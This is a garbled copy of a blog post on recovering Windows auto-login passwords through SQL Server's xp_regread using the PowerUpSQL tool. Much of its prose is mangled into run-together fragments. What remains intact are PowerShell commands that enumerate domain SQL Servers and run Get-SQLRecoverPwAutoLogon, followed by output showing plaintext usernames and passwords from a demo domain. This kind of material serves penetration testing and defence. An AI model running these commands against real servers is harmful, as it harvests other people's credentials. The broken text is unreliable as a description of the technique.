https://blog.netspi.com/get-windows-auto-login-passwords-via-sql-server-powerupsql/
PowerUpSQLSQL ServerdWindowsxp_regread
xp_regread
SQL Server2000xp_regreadSQL ServerSQL ServerLocalSystemSQL Server 2000 SP4xp_regreadSQLServer https://support.microsoft.com/en-us/kb/887165
xp_regread
xp_regreadPowerUpSQLGet-SQLServerInfo
SQL ServerSP4SQL Serverxp_regreadxp_cmdshellxp_cmdshelxp_regreadSQL Server
xp_regread Windows
WindowsPOSSQLWindows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
TSQLxp_regreadxp_cmdshellTSQL
Get-SQLRecoverPwAutoLogonPowerUpSQLWindowsWindows
SQL Server https://blog.netspi.com/blindly-discover-sql-server-instances-powerupsql/
PS C:\> $Accessible = Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 15 | Where-Object {$_.Status -eq "Accessible"}
PS C:\> $Accessible | Get-SQLRecoverPwAutoLogon -Verbose
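VERBOSE: SQLServer1.demo.local\Instance1 : Connection Success.
VERBOSE: SQLServer2.demo.local\Application : Connection Success.
VERBOSE: SQLServer2.demo.local\Application : This function requires sysadmin privileges. Done.
VERBOSE: SQLServer3.demo.local\2014 : Connection Success.
VERBOSE: SQLServer3.demo.local\2014 : This function requires sysadmin privileges. Done.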
ComputerName : SQLServer1
Instance     : SQLServer1\Instance1
Domain       : demo.local
UserName     : KioskAdmin
Password     : test

ComputerName : SQLServer1
Instance     : SQLServer1\Instance1
Domain       : demo.local
UserName     : kioskuser
Password     : KioskUserPassword!
xp_regreadsqlserverinfosqlrecoverpwautologon
https://support.microsoft.com/en-us/kb/887165
https://msdn.microsoft.com/en-us/library/aa940179(v=winembedded.5).aspx
http://sqlmag.com/t-sql/using-t-sql-manipulate-registry